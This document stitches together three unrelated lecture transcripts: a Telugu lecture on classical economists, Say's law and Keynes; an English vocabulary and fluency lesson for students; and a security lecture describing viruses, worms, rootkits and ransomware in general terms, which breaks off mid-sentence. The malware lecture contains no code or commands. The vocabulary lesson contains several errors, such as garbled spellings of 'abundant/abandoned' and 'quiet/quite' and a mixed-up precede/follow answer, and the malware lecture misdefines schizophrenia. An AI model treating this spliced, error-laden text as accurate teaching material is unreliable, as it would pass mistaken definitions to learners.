సాంప్రదాయ ఆర్థికవేత్తలు చెప్పిన సే సూత్రాన్ని, వేతన సరళత్వాన్ని, ధరల సరళత్వాన్ని విమర్శించటం జరుగుతుంది. విమర్శించి సప్లై అనేది డిమాండ్ పూర్తిగా సృష్టించుకొని ఎప్పుడు సంపూర్ణ ఉద్యోగిత ఉంటుందనేది చెప్పిన సాంప్రదాయవేత్తలను పూర్తిగా విమర్శించటం చెప్పి, ఇది డిమాండ్ సమస్య. 1930 తర్వాత ఆర్థిక మాంద్యం తర్వాత వచ్చిన సమస్య ఏంటంటే డిమాండ్ సమస్య, సప్లై సమస్య కాదు. డిమాండ్ని పెంచడానికి ఆర్థిక వ్యవస్థలో కొన్ని కార్యక్రమాలు చేపట్టాలి అని చెప్పి సాంప్రదాయ ఆర్థికవేత్తల యొక్క దాన్ని, ప్రిన్సిపల్స్ని, సూత్రాలని కీన్స్ విమర్శించడం అనేది జరుగుద్ది. దాని తర్వాత చివరిగా ఈ ముగింపులో ఈ సాంప్రదాయ ఆర్థికవేత్తలు చెప్పిన ఉద్యోగ సిద్ధాంతంలో భాగంగా చెప్పిన కొన్ని సూత్రాలు ఏ విధంగా ఇప్పుడు ఉన్న ప్రజెంట్ ఆర్థిక వ్యవస్థకి రిలవెంట్, ఏ విధంగా ఇప్పుడు ఉపయోగపడతాయి అని అనుకుంటే, సే సూత్రం కానీ పెట్టుబడిని పెంచడం ద్వారా, ఉత్పత్తిని పెంచడం ద్వారా ఉద్యోగిత కల్పించడం అనేది, ఇవి రెండు కూడా ఇప్పటికీ ఫ్రీ మార్కెట్లు, స్వేచ్ఛా మార్కెట్లు ఇప్పటికీ ఫాలో అవటం అనేది జరుగుతుందన్నమాట. మన భారతదేశం విషయానికి వచ్చేసరికి 1991 తర్వాత ఆర్థిక సంస్కరణలు జరిగి స్వేచ్ఛా మార్కెట్కి ఎక్కువ అవకాశం కల్పించి సాంప్రదాయవాదులు చెప్పిన పెట్టుబడి ద్వారానే, ఉత్పత్తి పెంచడం ద్వారానే ఉద్యోగిత పెంచడం అనేది జరుగుతుంది అని వాళ్ళు చెప్పిన ద్వారా ఆ పద్ధతినే ఉపయోగించి ఇప్పటికీ కూడా ఈ ఫ్రీ మార్కెట్ 1991 తర్వాత భారతదేశంలో ఆర్థిక వ్యవస్థ నడవటం అనేది జరుగుతుంది. ఇప్పుడు ప్రస్తుతం ఉన్న ప్రజెంట్ గవర్నమెంట్ కూడా ఈ సాంప్రదాయవాదులు చెప్పిన స్వేచ్ఛా మార్కెట్ని ఇప్పటికీ ఫాలో అవుతుందనే చెప్పుకోవాలి. వాటిల్లో భాగంగా ఇప్పుడు మినిమం గవర్నమెంట్, మ్యాక్సిమం గవర్నెన్స్ అనే సూత్రం ద్వారా గవర్నమెంట్ యొక్క పాత్రని తగ్గించేసి ఉత్పత్తిలో, ఉద్యోగతలోను పరిపాలన సౌలభ్యమే పెంచి ప్రైవేటు పెట్టుబడుల్ని పూర్తిగా ప్రోత్సహించి మన ఆర్థిక వ్యవస్థలో ఉత్పత్తిని పెంచి, ఉద్యోగతను పెంచి తద్వారా ఆర్థిక వృద్ధి సాధించాలని, దాని తర్వాత ఆర్థిక అభివృద్ధి కూడా సాధించాలని ప్రజెంట్ గవర్నమెంట్లు కూడా విశ్వసిస్తామనేది జరుగుతూ ఉంది. సో ఈ విధంగా సాంప్రదాయ ఆర్థికవేత్తలు చెప్పిన ఆ సూత్రాలు, స్వేచ్ఛా మార్కెట్ సూత్రాలు, సే సూత్రం అనేది ఇప్పటికీ స్వేచ్ఛా మార్కెట్లు, స్వేచ్ఛా ఆర్థిక వ్యవస్థలు ఇప్పటికీ ఫాలో అవుతూనే ఉన్నాయి, ఇప్పటికీ రిలవెంటే అని చెప్పవచ్చు. కానీ ప్రస్తుతం భారతదేశ ఆర్థిక వ్యవస్థలో ఉన్న అసమానతల దృష్ట్యా, ఆదాయ ఆస్తుల అసమానతల దృష్ట్యా పూర్తిగా
సాంప్రదాయవాద సిద్ధాంతవాదులు చెప్పిన స్వేచ్ఛా మార్కెట్లో ప్రైవేటు పెట్టుబడి ద్వారానే వృద్ధి అభివృద్ధి అని జరుగుతుందనేది ఒక డౌటు ఇప్పటికీ ఉంది. కాబట్టి కీన్స్ చెప్పిన డిమాండ్ సైడ్ గవర్నమెంట్ యొక్క ఖర్చు పెంచి డిమాండ్ను పెంచి ఎవరైతే ఆస్తులు లేకుండా ఉంటారో పేదవారు వాళ్ళ యొక్క కొనుగోలు శక్తిని పెంచి డిమాండ్ని పెంచాల్సిన అవసరం ఇప్పటికీ ఉంది అనేది కాదనలేని వాస్తవం. సో చివరిగా చెప్పేది ఏంటంటే సాంప్రదాయ ఆర్థికవేత్తలు స్వేచ్ఛా మార్కెట్లో పెట్టుబడి ద్వారా ఉత్పత్తిని పెంచి ఉద్యోగిత పెంచడం అనేది జరుగుతుంది. కీన్స్ దాన్ని డిమాండ్ కొద్దిగా తక్కువగా ఉంటుంది, ఎప్పుడు సప్లై ప్రాబ్లమే కాదు డిమాండ్ సైడ్ కూడా ప్రాబ్లం ఉంటుంది. అంటే డిమాండ్ పెంచడానికి గవర్నమెంట్ తన ఖర్చును కూడా పెంచుకొని గవర్నమెంట్ ఇక్కడ కీలకమైన పాత్ర పోషించాలి అనేది చెప్పడం అనేది జరుగుతుంది. ఇది ఈరోజు సాంప్రదాయ ఆర్థికవేత్తలు చెప్పిన ఉద్యోగ సిద్ధాంతము, దాని యొక్క విమర్శ. థ్యాంక్ యూ. Good afternoon, everyone. Welcome to today's session. So we are continuing with the communication skill aspect for ESC. So today I'm going to talk about the last two pillars, which is vocabulary and fluency. So what do we mean by vocabulary? So we all have challenges when it comes to using the right word when we are speaking in English. Like I said, we are thinking in a vernacular language, translating that to English directly, but sometimes we fail to understand what words to be used precisely to meet a particular context. Say for example, if I write a particular sentence, I'm going to demonstrate the issue that we face in terms of vocabulary. So there are two sentences I'm going to write. Just a moment. Okay. The medicine, let me add has here, the medicine has expired and hence it cannot be given to a patient, right? Now, the word that I'm going to talk about here is expired. We end up using this word in some other context as well. For example, if I say, the college management has declared a holiday as a founding member has expired. Now this is just an example. Now in India we use this word expired even when somebody passes away or somebody dies. So ideally what should be used here is has passed away. So instead of using expired here, in this context the word expired doesn't make sense because expired is used for medicines or anything that is perishable in nature. Okay. Now, if I have another word which is very, very frequently used, it is compulsory
it is compulsory to fill the form for the registration, or say 75% attendance is compulsory to attend the exam. It is compulsory to fill the form for the registration. Now what is happening here is I'm using the same word in both the sentences. I can have few more examples. For example, it's a statement. Please wait, the doctor will compulsory come by 5 p.m. So I'm using the same word in 3 different contexts. Now, as per the rule of vocabulary, I need to look at the context as well. So here, the correct word is mandatory. 75% attendance is mandatory to attend the exam. Please wait, the doctor will surely come by 5 p.m. Or let me try another sentence. I will definitely pay the loan. So here I'm using the word definitely. Okay? So I have compulsory, mandatory, surely, definitely. Instead of using these 3 words, we end up using the word compulsory again and again. So that's exactly what vocabulary is all about. A set of words within a language that are familiar to the person. The word bank, synonyms and antonyms that you are aware of. So the problems that we face is lack of word bank. For example, in this particular situation, I had 3 other words, but instead of using that, I keep on using the word compulsory. So that is because there is a lack of word bank, lack of synonyms or substitute words, not knowing what is the context I am using it for, lack of reading and writing practice, comprehension of common words. Now this comprehension of common words is a very, very big factor why we lack vocabulary, why we do not understand what words to be used when we are speaking. We hear words but we do not understand the meaning of it. Or we hear we see something but we don't know what is the word for it. Say for example, the word oracle, O-R-A-C-L-E. You ask anyone what do you mean by oracle, they will say it's the name of a company. But it also has a meaning. Oracle means prediction, prophecy, the word from the sky, Akashvani that we say in our language. So that is oracle. The word like cognizant. Cognizant, again, you ask someone what do you mean by cognizant, they will say it's a name of a IT company. But it also has a meaning. Cognizant means being aware of something, having the knowledge of something. So that is what the word cognizant means. So we hear a lot of words but we don't understand the meaning, we don't understand the application of it, or we see things but we don't know what is the English term for it. So when you read a lot, when you write a lot, you will build on your skills, your competencies, or your ability to build on your vocabulary as well. So the best way to build vocabulary is to keep on practicing, keep on reading a lot. Please always refer to the dictionary because the dictionary will also give you the meaning of the word in context of a sentence, and it also give you synonyms. Okay, so the tips to build vocabulary is to read regularly, to listen. When you listen to good speakers, that also helps. Make use of a dictionary or thesaurus. Thesaurus basically is a book that gives you the synonyms and antonyms as well, substitute words and opposite words. Learn a word every day in order to understand what it means, that is comprehension, the context, in what context it can be used, and the usage, and get into the practice of writing. So let's quickly look at some examples to practice.
Here we need to fill the blank with one of the word that is given in the option. Hardness is a dash of steel, a property, a substance, a material, a structure. So you need to look at the context of this sentence and pick the right option. Hardness is a property of steel means a nature of steel. So that's why A, property, is the correct answer. Now, property word is also used in terms of assets. I spent 50 lakhs to buy a property. So again, this is what vocabulary is all about, where you understand the context of the word. For example, if I am talking about a particular training program and I have designed certain content, so that's my intellectual property. Here again, it becomes like an asset. Foods such as, now I'm looking at number 2, foods such as bread and rice dash energy for the body. It controls energy for the body? No. Lose energy for the body? No. Prevent energy for the body? No. Provide. It provides energy for the body. Now the word provide here again can be used in a different context. Look at this example. I'm going to use the word provide as well as provided in two different possibilities or two different contexts. Please provide your contact details so that I can register you. Means please give me your contact details so that I can register you. Now, I can use the word provide or provided in another context. I can come for the meeting provided there is a formal invitation. Now here, the word provided means if there is a formal invitation. Number 3, the tissues, organs and systems of a body dash the living organism. Now a living organism has tissues, organs and systems. So system of a body of a living organism has tissues and organs. That is what it means. The tissues, organs and system of a body consist of a living organism. If you use the word consist of, that means every tissue has living organism in it. But that is not what it means. It means every living organism has tissues and organs in it. So the correct answer is A. So the tissues, organs and system of a body consist of the living organism, constitute living organism, contain living organism, include. So the tissues, organs and system of a body. B, option B. So I try to trick you there. Constitute a living organism means the tissues, organs and system of a body makes a living organism. It constitute living organism. Now the reason I did not use constitutes, I use constitute because we are also looking at subject verb agreement. My subject here is plural, which means I will drop the S at the end of this verb. Number 4, the door was so dash that the X-ray machine would not go through it. The door was so thin, so close, so minor, so narrow. Now what word can I use here? Thin, close, minor, narrow. I should use the word narrow because thin is not applicable. Narrow is in terms of width, right? So the door was so narrow that the X-ray machine would not go through it. Before Muhammad repaired the engine, he dashed it carefully. He recognized it, he examined it, he saw it, he cited it. Now this is fairly easy, just think and answer. Before Muhammad repaired the engine, he examined it carefully. So option B. The upper part of the leg is called jaw, scalp, thigh, ankle.
Now jaw is not an answer because it's on the face, scalp is on the head, we are talking about the leg. So the upper part is ankle? No, ankle is the lower part. Upper part is the thigh. The upper part of the leg is called the thigh. Number 7. For good health, everyone needs dash exercise. Almost exercise, inadequate exercise, excessive exercise, sufficient exercise. For good health, everyone needs sufficient, option D, sufficient exercise. In the alphabet, the letter B dash the letter A. Letter B follows letter A, ascends, precedes, comes. In the alphabet system, the letter B precedes letter A or follows. It should be follows because it's after. Precede means before, pre. So precedes is before, follows is after. Number 9, the river has been seriously contaminated. What you need to do here, you need to replace the underlined word with one of the options. The river has been seriously contaminated, dried up, diverted, polluted, obstructed. What do we mean by contamination? Contamination means pollution. So the river has been seriously contaminated. That means it's been polluted. Number 10, oil dash friction between moving parts so that they can move more easily. Oil dash friction between moving parts so they can move more easily. It permits friction, reduces friction, releases friction, and protects friction. What do you think is the correct answer here? The correct answer is it reduces friction. 10B. What do the experts forecast? What do we mean by forecast? To deny, to declare, to prefer, to predict. It's option D, predict. Forecasting means prediction. The markings on the thermometer make a scale, make extremes, a reading, a grid. So thermometer has markings, right? What do you do with it? You read. It makes a reading. So 12C. Some questions on synonyms and antonyms for you. Synonym of brief. Synonym means similar word. Synonym of brief. Limited, small, little, short. Now little and small is in terms of size. Here it's brief. That means option D is the answer. 13D, synonym of brief is short. Synonym of embezzle. Embezzle means to take money from something and put it somewhere else illegally. So option A is the correct answer. Synonym of embezzle is misappropriate. We keep reading, right? Misappropriation of fund, embezzlements of fund by politicians, by CEOs, CFOs. So embezzle means misappropriation or using the money illegally for some other purpose. Synonym of August. Now August is a month, but it also has a meaning. So synonym of August is common, ridiculous, dignified, petty. We use this sentence, right? You are invited for the August occasion of my birthday, wedding anniversary. So C is the correct answer. Synonym of August is dignified. Synonym of alert. Alert means being energetic, being observant, being intelligent, being watchful. Alert means
being watchful. Observe means you are just observing but not taking any action. Watchful means you watch and then take an action. That's alert. Synonym of reckless. This is very easy. Reckless means rash, courageous, bold, daring. Rash driving, reckless driving. So A is the correct answer. Synonym of consequences. Consequences is something that always comes after the action. So that's results. Conclusion, application, difficulties are wrong. Synonym of consequences is results. Synonym of tolerant. Tolerant means like-minded, open-minded, close-minded, arrogant. The correct answer here is open-minded. Tolerant means you accept anything which is other than what your belief system is. Synonym of abundant. Now I need to show you something. There is a word which is abundant, and there is a word which is abundant. Just a moment, I need to change the spelling, okay? Now, both have different meaning, but people use these two words interchangeably and they make a mistake. Abundant means excess. So, synonym of abundant is ripe, cheap, plenty, absent. So, C is the correct answer, plenty or excess. Okay. Abundant means to leave without providing any help. For example, I'm just going to give you examples here. There is an abundant supply of fertilizers for the farmers, which means excess or more than what is required, plenty. Now, abundant, let me give you example for that. So, abundant means excess or plenty. There is an abundant supply of fertilizers for the farmers. Abandoned means to leave without providing any help. The police team abandoned the people who were stuck in the floods. Okay. Now, here you will see a sentence and you need to pick one word substitute. Okay. It will also help you understanding the meaning of the words. A person of good understanding, knowledge and reasoning power. You call that person an expert, intellectual, snob, literate. Now, literate means somebody who can read and write. Snob means somebody who is arrogant. Expert means who's proficient in one or two specific areas. But here the question is, a person with good understanding, knowledge and reasoning power who can take the right decision. So, the correct answer is B, intellectual. List of business or subjects to be considered at a meeting. So, before a meeting we always list down what needs to be discussed. What do we call it? Schedule, timetable. Now, schedule and timetable are pretty much the same. Plan, agenda. Now, plan is much more broader aspect.
Agenda is the correct answer. Agenda is basically the list of items that needs to be discussed. Leave or remove from a place considered dangerous. So you are in a building, suddenly there is an earthquake, what do? You evade, you evacuate, you avoid, you exterminate. So evacuate is the correct answer. Option B, leave or remove from a place considered dangerous. A person pretending to be somebody he is not. A person pretending to be somebody he is not. Magician, rogue, liar, imposter. The correct answer here is imposter. Imposter is a person who pretends to be somebody he is not. One who possesses many talents. Somebody who is multi-talented. What do you call that person? Versatile, nubile, exceptional, gifted. You call that person versatile, who is good in more than one area. So A is the correct answer, 5A, versatile. 6. A person interested in collecting, studying and selling old things. Antiquarian, junk dealer, crank, archaeologist. Now archaeologist is a person who studies civilization by digging up, right? Monuments. So here we are talking about something which is collected and also sold and bought. So antiquarian, somebody who deals with antique stuff. Antiquarian is the correct answer. A drawing on transparent paper, a blueprint, red print, negative, transparency. Correct answer is blueprint. A small shop that sells fashionable clothes and cosmetics. A store, a stall, a boutique, a booth. Now stall and booth are temporary, but here it says a small shop, but it deals with only fashionable clothes and cosmetics. So it's called a boutique. C. An object which is used to calculate distance. Speedometer, barometer, odometer, thermometer. Now thermometer is used to measure temperature, right? Speedometer is to calculate speed. Barometer to calculate pressure. Odometer, now you have seen odometer on all the modern bikes, cars. There is a meter which you can keep changing. So which keeps changing. There is something which you can reset, that's called a trip meter, to measure the distance between for a specific trip. Odometer is the numbers which keeps scrolling, right? So that's odometer. A disease of mind causing an uncontrollable desire to steal. There are some people who have this problem. Even though they are rich, they keep stealing from stores and houses. That's called schizophrenia, claustrophobia, kleptomania, megalomania. Megalomania means somebody who thinks he is the greatest. Claustrophobia, who has the fear of being trapped in a small enclosure, small space. Schizophrenia means somebody who has split personality disorder. So correct answer is kleptomania. Now again, there are some more synonyms for you. Hesitated means stopped, paused, slowed, postponed. Now when you hesitate, you're doing something, you hesitate but you still do it, right? Hesitate means you pause for a while. So pause is the correct answer. Neutral. Neutral means unbiased, non-aligned, undecided, indifferent. The correct answer is A. Neutral means unbiased. Feeble. Feeble means weak, vain, arrogant, sick. Feeble means weak. Now don't make a mistake between W-E-A-K and W-E-E-K. Both are pronounced the same way. A weak is
basically 7 days. WEAK means something which is not strong. Okay, so feeble means weak. Restraint, hindrance, repression, obstacle, restriction. Please restrain the protesters from coming inside the meeting room. That means to restrict. 14D. Antonym. Antonym means opposite word. Toil. Toil means working hard, kind of a coil, being lazy, being unwell. Toil itself means working hard. That means the opposite is being lazy. C. Submissive. Aggressive, passive, assertive, obstructive. Submissive means somebody who accepts everything anybody else says. Aggressive means somebody who always opposes. So A is the correct answer. Opposite of submissive is aggressive. Choose the word which best expresses the meaning of the word shallow. Here again we are looking at synonyms. Shallow means artificial, foolish, superficial. We usually say that, right? This person has a shallow personality. That means he is not showing what he is in real. So superficial is the correct answer. Choose the word which best expresses the meaning of the word diversion or diversion. So diversion, distortion, deviation, obstruction or obstructive. Diversion means deviation. Now let's look at antonyms. Choose the word which best expresses, this is not looking opposite. Let's look at the opposite antonyms here. Choose a word which is exactly opposite of the word crowded. Deserted, empty, quiet. Now quiet, there are two ways to spell it. Quiet means little or some. Quiet means silence. Q-U-I-E-T is pronounced as quiet. Quiet means Q-U-I-T-E. So choose the word which exactly opposite of the word crowded means deserted. Deserted means there is nobody there. Now desert is different, deserted is different. Alright. Choose the word which is exactly opposite of the word flimsy. Flimsy means something which is not meaningful. So meaningful is the right word here. Opposite of confess, deny, refuse, contest. Confession, what do we mean by confession? When we accept our mistake. So we deny, refuse. Refuse is different, deny is different, okay? So deny is the correct answer. So that's about the vocabulary aspect. Now as far as the fluency is concerned, it's basically ability to bring together the pronunciation, grammar and vocabulary and speaking accurately and speaking well. The reason you lose confidence or lose the fluency, it's because you do not practice much. So when you're speaking to people around, speak as much as possible, read and write as much as possible. By the time you are in the final year, by the time you start going for interviews, you will be absolutely perfect with your ability to speak, ability to read and write. The best way to learn is to practice, to speak to people, to keep reading and writing every day. Try to hear something every day, maybe 15 minutes or 20 minutes on YouTube channel. Try to listen to different kind of speech, watch some interesting programs in English. If any word you come across which you do not know the meaning of, try looking it up in the dictionary and start using those words. That's the best way you can learn these words. Alright, so I hope this was helpful. Feel free to post your comment on the comment section on the YouTube channel. I'll take a look and provide you with the answer. Have a great day. I'll see you again. Bye-bye.
Hello everyone, welcome back to our discussion about different kind of attack methods what hackers are using to target our computers or our servers. So here in our last discussion we were discussing with how actually hackers can try to steal our passwords using spyware like keyloggers, or how they can try to steal our passwords if they have direct access to our computers using different kind of brute force or dictionary attacks or sniffing attacks or using phishing attacks. So today now we will discuss about what different kind of attack methods a hacker would use if hacker is not successful in stealing our passwords. So as we have discussed in our earlier sessions, we said hacker is trying to find out what is a vulnerability of a server or what is a vulnerability of a system and then try to launch an attack, but this is only done if hacker is somewhere on internet. Then we have taken a scenario where we assume that hacker is present within the network, and then we have seen how actually hackers are trying to launch attacks onto the system, that is by stealing the passwords. Now assuming hacker is not successful with both the cases, that is either trying to understand a vulnerability and launch an attack or by stealing the passwords, then hacker will try to destroy our systems or the data whatever is present here by using malwares. So now our discussion is about malwares. So let us see what actually a malware is and how this affects our systems and also our data. So here when you speak of malware, malware can be defined as a malicious software. So malware is a term which is used to define any kind of program which is designed to destroy or steal users' data or to destroy operating system related files or the required dependencies. So basically malware is a dangerous software which has been designed with an intention of either damaging or destroying the user data or the operating systems. Now when we speak of malwares, this can be distributed to us in different ways, like how we have seen earlier with keyloggers. Hacker can send this malware as a genuine software or maybe as a pirated application or as a crack or a keygen, or maybe hackers can attach these softwares to some other genuine softwares. Maybe a user wants to download MS Office. Instead of going into the official website, that is Microsoft.com, if a user tries to download this MS Office package from a third party, now there is no guarantee that the software is clean. It might be attached with some kind of malware which will in turn damage the user's computer or the data. So here when we speak of different types of malwares, we have things like viruses, worms, rootkits, ransomware, spyware, trojans. So like these are all like different sort of malwares are available there. Now the most common kind of malware that we are all aware of is something called virus. So we would have already faced this kind of issues in our computers as well. Maybe there is a virus infection and because of this sometimes our computers doesn't work properly, or maybe sometime you'll be able to boot up the system but maybe you don't have access to all different applications, or maybe when you try to run an application it would just crash, it doesn't run. So these kind of problems are faced by end users when there is a malware infection. So now let us discuss about these malwares one by one, and then we see what actually is a property, how does each malware affect a user's computer, and also we will see how hackers are able to make these malwares. So the first malware that we will be discussing is virus, which we are all aware of. Now generally speaking of virus, it is a program designed to destroy users' data or the operating system files. So it is either targeting the user data, whatever you have on your computer or on your mobile phone or your server, or it is trying to damage your operating system, so completely crash down your operating system, or maybe try to delete or damage your dependency files which are required for your operating system to function. Like say for example, what happens if some of the DLL files are removed from your operating system? Now DLL files are always required for your operating system to give you with its functionality or the features. Now if that dependency is removed or damaged, your application will not be stable. Your operating system might crash, or maybe your applications might not even start up. So here when we speak of what actually a virus can do or what sort of
features or what sort of properties a virus has, virus is a program which is destructive in nature. So as I said already, virus is designed to damage our data or the operating systems. So here virus is destructive in nature, so it is designed to damage the user's data. And when we speak of virus, most of the users have a belief that if there is a computer which has some virus infection, this virus will spread from one computer to other computer. But in reality, a virus on its own cannot spread over a network. So it will not be able to infect other computers in a network on its own. At the same time, a virus will not be able to make multiple copies of itself. A virus will not be able to replicate in number. So these are like the properties of a virus. Okay, so it is designed to damage our systems, but will not be able to replicate or will not be able to spread over a network. So here let me discuss about few virus programs which are considered to be one of the most dangerous viruses. So here there was a virus called Nixem. Nixem.e is a virus name. So like how we have different versions of a software, right? For this virus also there is a different version called Nixem.e, and this particular virus was designed in such a way, once it is infecting a user's computer, it is trying to identify all the files that are present on the hard drive with extensions like .txt, which is generally used by our notepad files, or maybe .doc, our document files, XLS, your Excel files, .db, MS Access, or .ppt, PowerPoint presentations, PDF, that is your Adobe format, or .log. This is generally used for creating the logs from multiple systems and saving them. So once Nixem.e is infecting a user's computer, it will try to find out if there is any file with any of these extensions on the local hard drive, and then it just makes an index of it, just prepares a list of all the files which has these extensions. And once your computer's date is April 3rd, so once your computer's date says it is April 3rd today, Nixem would wipe off the contents of all these files. So Nixem will delete all the contents of these files. So maybe you have some PowerPoint presentations, or maybe you have some documents related to your projects, or maybe about your exam preparations or something. On 3rd of April, if your computer has been infected with Nixem.e virus, it will delete all the contents of it. So when you open that particular document file or a PDF or a PPT something, you will only see a blank document. You don't see any content. So everything is erased. So this is what happens with Nixem infection on our computer. Considered to be one of the most dangerous virus ever created. Now not only with Nixem, there are also few more viruses similar to this. So let me show you. There is another virus called Chernobyl. Now this particular virus is named after a city. It was in Soviet Russia earlier, now it is part of Ukraine. Now there in Chernobyl city there was a nuclear accident, and now there are so many people who are affected because of this. So a guy, he made a virus, he made a program and named it after Chernobyl, and he has made it in such a way this would automatically execute itself on April 26th. So this virus will automatically execute itself on 26th of April. So you don't have to execute any program, or you don't have to run something. Similar to Nixem, this application is also coded to execute itself on a specific date. Now 26th of April is the date when the nuclear accident happened in Chernobyl. Now the person who made this virus, the main intention is just to make sure that no one would forget what happened on 26th of April in Chernobyl. Now what this particular virus does, once it is infecting a user's computer, it just keeps on checking the system date, whether it is 26th of April or not. And if it is on 26th of April, it will erase our system BIOS and sector 0 of hard drive. So here you all know, like BIOS is a chip where you have your
program called post power on self test. Now if BIOS chip has been erased and the program has been deleted, you will not even be able to power on the computer. You will not even be able to start your computer there. So that's the danger here. Or let us say you just want to take away your hard drive and use it on a different computer which is still working on 26th of April. Hopefully that is not infected with Chernobyl. Now because sector 0 of your hard drive has been removed or erased, the other computer will not be able to detect your hard drive. So here this particular virus is directly damaging the hardware. So earlier when we speak of Nixem, it is only damaging the software or the contents of the user document files, but here Chernobyl is directly targeting the hardware of a user's computer. So like this, viruses will be able to damage our system data also, or maybe it can also damage our hardwares. Now there is another virus here, something called Happy Birthday virus. So this is also one of the oldest as well as one of the most dangerous virus ever created. Now Happy Birthday virus would spread via emails. So it is like on the birthday of a victim, assume like on your birthday you have received a greeting card via an email. So obviously you will feel very, very happy because one of your friend remembers your birthday and they are also sending you with a wishes. Now once you open the email, it starts playing an animation where it just shows you with a cake, puts up a candle, also lights it, and then it will ask you like click on the candle as if like you are putting off the light. Now generally what we do is we light up the candle and then we put off the light. Now we start expecting like maybe some happy birthday wishes or song or something would happen, but what actually happens on your computer screen goes blank, so it doesn't display anything once you click on the candle, and then you will see here that your computer is restarting, and then finally there is a message saying operating system missing. So what actually happens with Happy Birthday virus, when you click on the candle, it is sending a command to format your C drive. So it is sending a command to format your computer's C drive where all the operating system and all the required files are present. So because your computer is already booting up from C drive, it will not be able to format it right away. So it just tries to restart, and when it is booting up, it will try to format the C drive. Now once it tries to format C drive, you will not have all the required files to boot up your operating system. So that's the reason you get a message, operating system missing, please insert the boot disk. So these are hackers are able to make different sort of viruses to either damage the data or maybe the hardware. So virus has only one thing, it is always designed to damage your data. So now let us see what other kind of malwares we have. So here when you speak of the next kind of malware, that is about worms. Now worms are actually designed to bring down the system's performance. So worms are not designed to damage your data, they don't harm your hardware, but they just try to utilize all the resources available on your computer and bog down the performance. Now what actually happens with a worm? It is non-destructive in nature, so a worm will not damage our computer's data, but a worm can replicate in number, so it can create multiple copies of itself, and then a worm can also spread over a network. So worms can also spread from one computer to other computer in a network. And when you speak of worms, they can also act as a carrier program for any other kind of malwares. So worms are also having the capability to take a different kind of malware from one computer to other computer. So assuming that there is a worm infection on a computer, now let us say there is a worm which is 10 KB in size. So it's just a very, very small program, 10 KB. But assume the worm has been programmed in such a way, it has to create 100 copies of itself for every 10 seconds. So now there is a small file of just 10 KB in size, but it is designed in such a way that it has to create 100 copies of itself for every 10 seconds.
Now just imagine what happens there. After 10 seconds, it makes 100 copies. After another 10 seconds, it will make another 100 copies of all these files. So it's like this file has now become 100. Now all these files will again try to make 100 copies for themselves. So like this the process continues. It's like a chain reaction. Now for every 10 seconds, each of the file will try to make 100 copies of itself. Now just imagine if this particular process is happening on your computer for the last 2 hours or maybe 3 hours. What actually happens to your system resources? Now here, as long as your computer is running in, this process would continue. That is, each file trying to make 100 copies of itself. So now the problem is, when you speak of a worm, worm is a program. It is a software. Now this program was made in such a way it has to make 100 copies per every 10 seconds. So who makes this 100 copies? This program has to be executed by your processor. So this particular program has to be executed by your processor. Now your processor will have to take up the program and then make 100 copies of itself. But again, this program is not finished. So it did not complete its activity. So it says, I'll come back after 10 seconds to request you for another 100 copies. So now your processor says, okay, this program is still being executed. It did not finish the activity. So to save all these files, your processor would say, put them into the RAM. So now after 2 hours or maybe 3 hours, all your computer's RAM is utilized by worms. So your worms are occupying all the available RAM. So your RAM is now full with all the worms, and your processor is also busy from all the commands coming in from your worms. So just imagine after 2 hours you have some millions of files which are already present in the RAM, and they are all coming back to the processor asking, please make 100 copies of myself. So now what actually happens, whatever the processor you have, you may have maybe a Core i5 or a Core i7 or even a Xeon processor. Your processor is overloaded with all the commands coming from worms, and your RAM is also full with all these applications, all the worms. So at this time maybe you want to open up your web browser and check your email. Now the problem is your web browser is there on the hard drive. It's in your program files. So now your operating system will have to take all the files from your hard drive, put it onto RAM, and from RAM it has to send it to processor. But the problem is my RAM is already full. Now I don't have free RAM available. So it takes some time for my operating system to clear the contents from RAM and then put it in RAM there. So I'll have to wait for some time. And then after going in from RAM, processor is updated about a new information that user wants to access this particular web browser, maybe a Firefox or Chrome or something. Now processor is already busy with all the commands from worms, so it will not be able to immediately act on your request. So finally we come to a feeling that because there is some kind of infection, our computer has become very, very slow. So finally we say our system has become slow, and in general we always say that is because of virus. But in reality it is not because of a virus, but that is because of worms which are utilizing all your computer's resources. So worms would take up all the resources of your computer to bring down the performance. So this is what happens with worms. Now let us see with other kind of malwares. So here there is another kind of malware called rootkit, which is actually designed to prevent a user from performing some general activities like accessing a web browser or maybe a task manager or a command prompt. So maybe even you have already faced these kind of issues. When you try to access your command prompt or task manager, it says like access to task manager has been disabled by administrator. Now if you are already present in a corporate network and your computer is part of that particular domain, that can be understood. Maybe like administrator don't want end user to access the task manager or maybe command prompt and issue some commands. But if the same error message is seen on your own computer, on your personal computer, where you are the administrator, what does it mean? So here that is because of a malware called rootkit. Now what rootkit does,
it is stopping you from accessing your files. Maybe a rootkit was designed in such a way that you should not have access to internet. So it will directly stop all the services required for you to access internet, like say DNS resolution, it will stop it, or obtaining IP address automatically from DHCP, it will stop that. Or maybe you don't want to access internet, it will just try to stop your web browser. So any web browser that you install, it will just stop the application, it will just crash it. So that's how a rootkit prevents a user from accessing some genuine applications or services. And not only stopping the user, a rootkit is also very intelligent. It will replace your operating system's original boot files with infected ones. So it is removing the original boot files from your operating system and then replace them with files which are infected with rootkits. So basically what happens here, when you are trying to power on your computer, you try to power on the system, your operating system starts booting up. Now along with the operating system, rootkit is also activating itself. Now this is a big problem there. Now once rootkit is activating itself along with the operating system, then it has full control over any other service or any other application that might start up. Now let us say I am already having an antivirus installed on my computer. Now when does this antivirus start up? Once my operating system finishes the booting procedure, then the antivirus related services would start, and then it will start checking for all the malicious behavior. But here the problem is, when there is a rootkit infection, rootkit is activating itself along with the operating system. So now when my antivirus tries to start up or the services are trying to start, rootkit also has a capability to stop that service. So even though I am having an antivirus, it's of no use, it will not be activated. So your antivirus will never be active and the services would not be running it. But as an end user, we are always in a belief that, okay, we have installed an antivirus, so it is always taking care of securing my computer from viruses and all. But in reality, a rootkit has already stopped the services of this antivirus. So that's how rootkits will compromise our computer. And once rootkit is active, then hacker can continue with infecting our machines using viruses or worms or any other kind of malware, like say spyware or adware like this. And here when we speak of the recent trends, everyone is speaking about something called ransomware. Now here when we speak of ransomware, this is a malware which is designed to stop end user from accessing some data unless user pays hacker with some money. So here when we say ransomware is trying to stop you from accessing the data, it is exhibiting the property of a rootkit. It is stopping you from accessing something. But at the same time, if you are ready to pay some money, or if you are ready to pay some ransom to the hacker or whoever has made this ransomware, he is ready to give you with the decryption keys. Now generally what happens, a ransomware once infecting your computer will slowly encrypt all the user data. It will slowly encrypt all the user data so that all your data is changed or converted into an unknown format. So once the data has been encrypted, it will give you with a pop-up message or will give you with a notification saying that all your data has been encrypted, and now you will have to pay some money to get the decryption keys. So if you are ready to pay and you do that, you will be getting the decryption key and you will have access 